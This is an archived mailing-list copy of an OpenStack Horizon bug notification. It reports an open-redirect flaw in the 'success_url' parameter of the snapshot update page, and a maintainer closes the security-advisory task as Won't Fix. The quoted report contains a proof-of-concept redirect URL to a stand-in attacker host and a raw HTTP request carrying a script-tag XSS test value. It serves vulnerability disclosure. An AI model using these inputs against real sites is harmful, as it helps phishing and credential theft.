← Back to team overview

yahoo-eng-team team mailing list archive

  1. yahoo-eng-team team
  2. Mailing list archive
  3. Message #94670

[Bug 1982676] Re: Open redirect / phishing attack via "success_url" parameter in OpenStack

  Thread PreviousDate PreviousThread Next 
Given this bug report is over 2 years old and took a year in public just
to get into stable point releases, it doesn't seem to rise to the level
of urgency where we'd issue an OSSA. As such, I'm closing the Security
Advisory task as Won't Fix, but if there are any dissenting opinions I'm
happy to reopen and revisit that decision.

** Changed in: ossa
       Status: Incomplete => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1982676

Title:
  Open redirect / phishing attack via "success_url" parameter in
  OpenStack

Status in OpenStack Dashboard (Horizon):
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  The "success_url" param is used when updating the project snapshot and
  it lacks sanitizing the input URL that allows an attacker to redirect
  the user to another website.

  For instance, the URL below will redirect you to https://hacker.com:

  https://xxx.com/project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https://hacker.com

  The attacker can send this link to the user and when they click on the
  "Update" button the request and response will look like this:

  [+] Request

  POST /project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https%3A%2F%2Fhacker.coom HTTP/1.1
  Host: xxx.com
  Cookie: _ga_0CPB5J3KQB=GS1.1.1656302247.2.0.1656302247.0; _ga=GA1.1.2043123211.1656300031; login_region=default; login_domain=""; theme=default; sessionid=yl7fjfh7dhpwduodbxb4mjxng46qowgh; csrftoken=j5WQq7woP7OJGKnbTAa6cbQ8zyEgUhWjIZRu4vDMNgbFbNIl5bAe7V2PESYSbUYI; recent_project=dfcf9f80229f400a9e7ac53782be9e39
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  <====================>SNIP<====================>

  csrfmiddlewaretoken=9wp8nOC21UvAGFxqG0qa1DjRsdKg26P0yqkM1cJqZ3SwbISASBQiWnvyxx4SjJRp&name=snapshot+for+%3Cscript%3Ealert%281%29%3C%2Fscript%3E+%22+%27%5Cu0022%C3%A2%5Cx04&description=

  [+] Response

  HTTP/1.1 302 Found
  date: Tue, 12 Jul 2022 10:14:38 GMT
  server: Apache/2.4.41 (Ubuntu)
  location: https://hacker.com
  content-length: 0
  x-horizon-location: https://hacker.com
  x-frame-options: SAMEORIGIN
  vary: Accept-Language,Cookie
  content-language: en
  <====================>SNIP<====================>

  Impact: The attacker can trick redirect users to the cloned website to
  steal information, a so-called Phishing Attack.

  CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
  http://cwe.mitre.org/data/definitions/601.html

  I have tested it on OpenStack Xena so the Horizon dashboard could be between version 20.0.0 to 20.1.2. I haven't tested the bug on other versions.
  Unfortunately, I have discovered this bug when pen-testing a black box project so I do not have the log file. Hope my information helps you to understand the bug.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1982676/+subscriptions
  Thread PreviousDate PreviousThread Next